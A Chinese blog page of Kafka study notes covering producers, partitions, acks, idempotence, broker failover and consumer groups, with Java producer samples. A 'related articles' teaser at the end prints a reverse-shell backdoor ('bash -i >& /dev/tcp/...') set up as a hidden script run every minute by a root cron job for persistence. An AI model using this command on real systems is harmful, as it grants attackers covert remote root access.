kafka笔记

news2025/1/10 16:53:38

      • 消息队列 场景
      • 模式
      • 基础架构
      • 发送原理
        • 异步发送
        • 同步发送
      • 分区
      • 生产者提高吞吐量:
      • 数据可靠性
        • ack应答
      • 数据重复
        • 幂等性
        • 事务
      • 数据有序
        • 数据乱序
      • broker工作流程
        • follower故障
        • leader故障
      • 数据查找
      • 文件清除
      • 高效读写
      • 消费者流程
        • 消费者组初始化
          • 分区分配策略
        • 自动提交offset
        • 手动提交
        • 指定位置消费
        • 数据积压(消费者提高吞吐量)

Kafka:数据管道、流分析、数据集成和关键任务应用。存储、计算、分析、集成

消息队列 场景

缓存/消峰:数据量过大时,消息队列缓存数据,服务端缓慢读取

解耦:数据源、目的地不同,符合接口约束即可
在这里插入图片描述
异步通信:无所谓的工作,由其他从kafka中读取完成

模式

  • 点对点:一对一,消费者读取后删除
  • 发布订阅模式(设计模式):多对多,消费者相互独立,消费后不删除,其他消费者可以读到数据。多个topic主题

基础架构

  • 海量数据,为提高吞吐量分区,一个topic分为多个partition。一个分区的数据只能由一个消费者来消费
  • 为提高可用性,为每个partition增加若干副本,partition为leader,副本为follower,生产和消费只针对leader,leader挂掉后follower推举产生新的leader
  • 分区信息, leader和follower信息由zk存储,新版本可以不使用zk存储
  • Consumer Group(CG):消费者组,由多个consumer组成。消费者组内每个消
    费者负责消费不同分区的数据,一个分区只能由一个组内消费者消费;消费者组之间互不影响。所有的消费者都属于某个消费者组,即消费者组是逻辑上的一个订阅者。

发送原理

在这里插入图片描述
序列化器:客户指定,java自带的过重
分区器:分区器在内存中,大小32m,实际上为一个缓存队列,包含多个双端队列。一个分区一个队列,将数据发送到对应的队列中(一个数据发往多个队列)。分区器中还包含一个内存池,每一批次数据从内存池取内存插入队列,发送成功后删除数据,内存释放回内存池
sender:从分区器中读取数据发到kafka,队列中累积16k数据为一组读取发送。如果未达到16k,在达到linger.ms时间也读取发送。每个分区一个队列,读取对应分区队列的数据发送到对应分区(leader和follower)。如果分区未应答,可继续发送,最多可发送五组数据,如果仍未应答则不再发送。分区应答,回复成功,则清除sender发送的数据以及分区器队列中的数据,失败则重试(次数不限)。
异步发送:将外部数据发送到分区器中(同步发送,等上一批数据已发送到kafka集群中再继续发送)

异步发送

// 1.创建kafka生产者的配置对象
Properties properties = new Properties();

// 2.给kafka配置对象添加配置信息
properties.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, "hadoop102:9092");
// key,value序列化(必须):key.serializer,value.serializerproperties.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG,
StringSerializer.class.getName());
properties.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG,StringSerializer.class.getName());

// 3.创建kafka生产者对象
KafkaProducer<String, String> kafkaProducer = new KafkaProducer<String, String>(properties);

// 4.调用send方法,发送消息
for (int i = 0; i <5; i++) {
	//添加回调
	kafkaProducer.send(new ProducerRecord<>("first", "atguigu" + i),new Callback(){
		//该方法在Producer收到ack时调用,为异步调用
		@Override
		public void onCompletion(RecordMetadata metadata, Exception exception) {
			if (exception == null) {
				//没有异常,输出信息到控制台
				System.out.println("主题:" +
				metadata.topic()+ "->"  + "分区:" +metadata.partition());
			} else {
				//出现异常打印
				exception.printStackTrace();
			}
		}
	});
	//延迟一会会看到数据发往不同分区
	Thread.sleep(2);
}

// 5.关闭资源
kafkaProducer.close();

同步发送

// 1.创建kafka生产者的配置对象
Properties properties = new Properties();

// 2.给kafka配置对象添加配置信息
properties.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, "hadoop102:9092");
// key,value序列化(必须):key.serializer,value.serializerproperties.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG,
StringSerializer.class.getName());
properties.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG,StringSerializer.class.getName());

// 3.创建kafka生产者对象
KafkaProducer<String, String> kafkaProducer = new KafkaProducer<String, String>(properties);

// 4.调用send方法,发送消息
for (int i = 0; i <5; i++) {
	//异步发送默认
//            kafkaProducer.send(newProducerRecord<>("first","kafka" + i));
	//同步发送
	kafkaProducer.send(new ProducerRecord<>("first","kafka" + i)).get();
}

// 5.关闭资源
kafkaProducer.close();

分区

  • 便于合理使用存储资源,数据存储在多台Broker上。合理控制分区的任务,可以实现负载均衡的效果。
  • 提高并行度,生产者可以以分区为单位发送数据;消费者可以以分区为单位进行消费数据。

有指定分区,按指定分区,没有制定分区按key,没有制定分区没有key,随机一个一直使用直到已满或已完成,再随机一个(必须和上一个随机的不同)

可自定义分区器:实现Partitioner接口

生产者提高吞吐量:

batch.size:批次大小,默认16k
linger.ms:等待时间,修改为5-100ms
compression.type:压缩snappy
RecordAccumulator:缓冲区大小,修改为64m

数据可靠性

ack应答

  • 0:生产者发送过来的数据,不需要等数据落盘应答。效率最高。如果服务端挂掉则数据丢失(此时数据在内存中,或未收到),不安全
  • 1:生产者发送过来的数据,Leader收到数据后应答。应答后,leader数据还未与follower同步就挂掉,则数据丢失
  • -1(all):生产者发送过来的数据,Leader+follower(ISR队列)收齐数据后应答。数据可靠,若一个follower挂掉则无法收齐。
    ISR队列:和Leader保持同步的Leader+follower,follower一段时间内未与leader同步数据或通信则认为follower挂掉,踢出ISR队列。
    若分区副本数为1,或ISR应答最小副本数量=1,当follower挂了,则与ack=1情况相同
    数据完全可靠条件:ack=-1+分区副本数>=2+ISR应答最小副本数量>=2
    数据重复(ack=-1)
    leader+部分follower获得数据,未收齐时leader挂掉,没有回复ack,则重新选举leader,重发数据,follower可能获得一个已获得的数据。

数据重复

最多收一次:ack=0
最少收一次:ack=-1
精确一次:

幂等性

幂等性就是指Producer不论向Broker发送多少次重复数据,Broker端都只会持久化一条,保证了不重复。
精确一次(ExactlyOnce)=幂等性+至少一次(ack=-1+分区副本数>=2+ISR最小副本数量>=2)。
重复数据的判断标准:具有<PID,Partition,SeqNumber>相同主键的消息提交时,Broker只会持久化一条。
其中PID是生产者id,kafka每重启一次,产生一个新的id;Partition表示分区号;SequenceNumber是单调自增的。
所以幂等性只能保证的是在单分区单会话内不重复。
如果重复,不会在磁盘中落盘,在内存中删掉

事务

在这里插入图片描述

数据有序

保证单分区内有序
可以完成多分区内有序:多个分区统一读取,排序,效率低。不如只用一个topic

数据乱序

生产者最多可接受kafka五个数据包没有应答
eg:①②正常发送,③失败,④正常,③重发

方案:
(1)未开启幂等性
max.in.flight.requests.per.connection需要设置为1。
(2)开启幂等性
max.in.flight.requests.per.connection需要设置小于等于5。
原因说明:因为在kafka1.x以后,启用幂等后,kafka服务端会缓存producer发来的最近5个request的元数据,故无论如何,都可以保证最近5个request的数据都是有序的。

①②有序,正常落盘,应到③,实际收到④,则内存中缓存④,直到收到③

broker工作流程

offset存于kafka 的topic中
broker启动向zk注册,zk存储broker、leader相关信息
zk选举leader 按照AR中的顺序,要求ISR中存活的
follower主动拉取数据,与leader同步
在这里插入图片描述
数据以log形式存放,实际分为多个segment,为segment建立索引,便于查找

follower故障

LEO(Log End Offset):每个副本的最后一个offset,LEO其实就是最新的offset + 1。
HW(High Watermark):所有副本中最小的LEO。

消费者能见到的最大的offset = HW-1
在这里插入图片描述

leader故障

从ISR中选出一个新的Leader
为保证多个副本之间的数据一致性,其余的Follower会先将各自的log文件高于HW的部分截掉,然后从新的Leader同步数据。
只保证副本之间的数据一致性,并不能保证数据不丢失或者不重复。

数据查找

分区数据以log形式存储,log分片为segment,对segment建索引
数据在末尾插入到log中
index为稀疏索引,4kb数据一条索引

index文件名中有offset
根据文件名,判断使用哪个index文件
index文件名中的offset+index存储的相对offset 选择适当的log文件
根据log文件查找位置

文件清除

delete:以segment中最后文件的时间为时间戳,计算过期时间
数据过大,超出最大范围,则删除最早的segment
compact压缩:
同一个key只留最新的value,其余删掉

高效读写

  • 分布式
  • 稀疏索引,快速定位
  • 顺序写磁盘
  • 页缓存+零拷贝:不对数据进行处理,不走应用层,所以零拷贝(linux提供),效率更高。数据到kafka存储于页缓存,然后存于内存/落盘
  • 16kb一个包,传输次数减少

消费者流程

消费者消费的offset,存于kafka集群,topic相关位置。如果存在zk,会导致客户端和zk频繁通信

一个消费者可以消费多个分区
一份分区只能由消费者组内的一个消费者消费
组内每个消费者负责消费不同分区

消费者组初始化

根据groupid 选择分区,所有消费者与分区的coordinator通信,coordinator选择一个消费者做leader,将相关信息反馈给消费者leader,leader制定合适的消费计划把方案发给coordinator,coordinator发给所有消费者。如果消费者挂掉或者消费时间过长,则将其消费工作Rebalance,分配给其他消费者

消费一次,1k-50m数据/一定时间内的数据为一条,一次五百条

分区分配策略

range:一个topic的全部分区按分区号排序,平均分给所有消费者,除不尽的给最前面的几个消费者。
数据倾斜:最前面的几个消费者获取更多数据,如果多个topic,则前面几个消费者总能获得更多数据,压力大
RoundRobin:所有Topic所有的partition按照hashcode排序,轮询分配partition给到各个消费者。
Sticky:全部分区乱序,其他约等于range

自动提交offset

每隔五秒,自动提交
重复消费:已消费,未提交,消费者挂了,则重启后,从旧offset处消费

手动提交

同步/异步提交:消费数据&提交offset
漏消费:已消费,offset已提交,数据未落盘,消费者挂了,则数据丢失。重启后从offset位置向后消费

避免数据重复/丢失:生产端,消费者应支持事务

指定位置消费

指定offset:消费者中设置offset
指定时间:时间转为offset

数据积压(消费者提高吞吐量)

增加分区和消费者
消费者拉取数据50m,500条,修改参数

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/421403.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

GaussDB数据库事务介绍

目录 一、前言 二、GaussDB事务的定义及应用场景 三、GaussDB事务的管理 四、GaussDB事务语句 五、GaussDB事务隔离 六、GaussDB事务监控 七、总结 一、前言 随着大数据和互联网技术的不断发展&#xff0c;数据库管理系统的作用越来越重要&#xff0c;实现数据的快速读…

Springboot——文件的上传与下载(reggie)

目录 一、文件上传——upload 1.1 介绍 1.2 前端代码实现 1.3 后端代码实现 二、文件下载——download 2.1 介绍 2.2 前端代码编写 2.3 后端代码编写 三、 前端总代码 四、 应用场景 4.1 数据库表 4.1.1 菜品表 4.1.2 菜品口味表 4.1.3 菜品分类及菜品套餐表 4.2 实体类 4.…

【GitHub Copilot X】基于GPT-4的全新智能编程助手

文章目录一、前言1.1 编程助手的重要性和历史背景1.2 Copilot X 的背景和概览1.3 Copilot X 的核心技术二、自然语言处理技术的发展和现状2.1 GPT-4 技术的基本原理和应用场景2.2 Copilot X 如何利用 GPT-4 进行智能编程2.3 Copilot X 的特点和优点三、比较 Copilot X 和传统编…

Vue组件的通信方式有哪些?

文章目录组件间通信的概念组件间通信解决了什么&#xff1f;组件间通信的分类组件间通信的方案props传递数据$emit 触发自定义事件refEventBus$parent 或 $root$attrs 与 $listenersprovide 与 injectvuex小结组件间通信的概念 开始之前&#xff0c;我们把组件间通信这个词进行…

ChatGPT背后有哪些关键技术?CSIG企业行带你一探究竟

目录1 ChatGPT的时代2 CSIG企业行3 议题&嘉宾介绍3.1 对生成式人工智能的思考3.2 对话式大型语言模型研究3.3 文档图像处理中的底层视觉技术4 观看入口1 ChatGPT的时代 2015年&#xff0c;马斯克、美国创业孵化器Y Combinator总裁阿尔特曼、全球在线支付平台PayPal联合创始…

一文总结经典卷积神经网络CNN模型

一般的DNN直接将全部信息拉成一维进行全连接&#xff0c;会丢失图像的位置等信息。 CNN&#xff08;卷积神经网络&#xff09;更适合计算机视觉领域。下面总结从1998年至今的优秀CNN模型&#xff0c;包括LeNet、AlexNet、ZFNet、VGG、GoogLeNet、ResNet、DenseNet、SENet、Sque…

11万字数字政府智慧政务大数据建设平台(大数据底座、数据治理)

本资料来源公开网络&#xff0c;仅供个人学习&#xff0c;请勿商用&#xff0c;如有侵权请联系删除。部分资料内容&#xff1a; 一.1.1 数据采集子系统 数据采集需要实现对全区各委办单位的数据采集功能&#xff0c;包括离线采集、准实时采集和实时采集的采集方式&#xff0c;根…

【云原生】Kubernetes(k8s)之容器的探测

Kubernetes&#xff08;k8s&#xff09;之容器的探测一、探测类型及使用场景1.1、startupProbe&#xff08;启动探测&#xff09;1.2、readinessProbe&#xff08;就绪探测&#xff09;1.3、livenessProbe&#xff08;存活探测&#xff09;二、检查机制三、探测结果四、容器探测…

Springboot是怎么解决跨域问题的?

什么是跨域&#xff1f;简单理解&#xff0c;就是在不前网页下&#xff0c;试图访问另外一个不同域名下的资源时&#xff0c;受到浏览器同源策略的限制&#xff0c;而无法正常获取数据的情况&#xff1b;什么是同源策略同源策略是浏览器出于安全考虑而制定的一种限制资源访问的…

C++输入输出、缺省参数、函数重载【C++初阶】

目录 一、C输入&输出 二、缺省参数 1、概念 2、分类 &#xff08;1&#xff09;全缺省 &#xff08;2&#xff09;半缺省 三、函数重载 1、概念 2、原理------名字修饰 一、C输入&输出 在C语言中&#xff0c;我们常用printf和scanf这两个函数进行输入输出。 …

【权限维持】LinuxRootkit后门Strace监控Alias别名Cron定时任务

权限维持-Linux-定时任务-Cron后门 利用系统的定时任务功能进行反弹Shell 1、编辑后门反弹 vim /etc/.backshell.sh #!/bin/bash bash -i >& /dev/tcp/47.94.xx.xx/3333 0>&1 chmod x /etc/.backshell.sh2、添加定时任务 vim /etc/crontab */1 * * * * root /…

Vue插槽理解

Vue插槽理解插槽插槽 slot又名插槽&#xff0c;vue内容分发机制&#xff0c;组件内部的模板引擎使用slot元素作为承载分发内容的出口 插槽slot是子组件的一个模板标签元素&#xff0c;而这一个元素是否显示&#xff0c;以及怎么显示是由父组件决定的 slot分为三类&#xff1a;默…

【Java】Maven是什么?手把手先创建个Maven项目

&#x1f680;Java程序员必备的项目管理工具——Maven &#x1f4d3;推荐网站(不断完善中)&#xff1a;个人博客 &#x1f4cc;个人主页&#xff1a;个人主页 &#x1f449;相关专栏&#xff1a;CSDN相关专栏 &#x1f3dd;立志赚钱&#xff0c;干活想躺&#xff0c;瞎分享的摸…

线程池技术

线程池技术是一种典型的生产者-消费者模型。 线程池技术是指能够保证所创建的任一线程都处于繁忙状态&#xff0c;而不需要频繁地为了某一任务而创建和销毁线程&#xff0c;因为系统在创建和销毁线程时所耗费的cpu资源很大。如果任务很多&#xff0c;频率很高&#xff0c;为了…

站上风口,文心一言任重道远

目录正式发布时机选择逻辑推理AI绘画用户选择总结自从OpenAI公司的chatGPT发布以来&#xff0c;吸引了全球目光&#xff0c;同时也引起了我们的羡慕&#xff0c;希望有国产的聊天机器人&#xff0c;盼星星盼月亮&#xff0c;终于等来了百度文心一言的发布。 正式发布 3月16日…

VUE3项目实现动态路由demo

文章目录1、创建vue项目2、安装常用的依赖2.1 安装elementUI2.2 安装axios2.3 安装router2.4 安装vuex2.5 安装store2.6 安装mockjs3、编写登录页面以及逻辑4、编写首页以及逻辑5、配置router.js6、配置store.js7、配置menuUtils.js&#xff08;动态路由重点&#xff09;8、配置…

像ChatGPT玩转Excel数据

1.引言 最近ChatGPT的出现&#xff0c;把人工智能又带起了一波浪潮。机器人能否替代人类又成了最近热门的话题。 今天我们推荐的一个玩法和ChatGPT有点不一样。我们的课题是“让用户可以使用自然语言从Excel查询到自己想要的数据”。 要让自然语言可以从Excel中查数据&#…

论文阅读笔记《Joint Graph Learning and Matching for Semantic Feature Correspondence》

核心思想 本文提出一种联合图学习和图匹配的算法&#xff08;GLAM&#xff09;&#xff0c;将图的构建和匹配过程整合到一个端到端的注意力网络中。相比于其他启发式的建图方法&#xff0c;如Delaunay三角法、KNN方法或完全图&#xff0c;通过学习构建的图结构能够更加准确的反…

配置pytorch(gpu)分析环境

Pytorch是目前最火的深度学习框架之一&#xff0c;另一个是TensorFlow。不过我之前一直用到是CPU版本&#xff0c;几个月前买了一台3070Ti的笔记本&#xff08;是的&#xff0c;我在40系显卡出来的时候&#xff0c;买了30系&#xff0c;这确实一言难尽&#xff09;&#xff0c;…

【AutoGPT】你自己运行,我先睡了—— ChatGPT过时了吗?

系列文章目录 【AI绘画】Midjourney和Stable Diffusion教程_山楂山楂丸的博客-CSDN博客 目录 系列文章目录 前言 一、AutoGPT是什么&#xff1f; 二、AutoGPT带来的利弊 三、AutoGPT和ChatGPT区别 四、未来 总结 前言 ChatGPT是否过时&#xff1f;AutoGPT的兴起&#…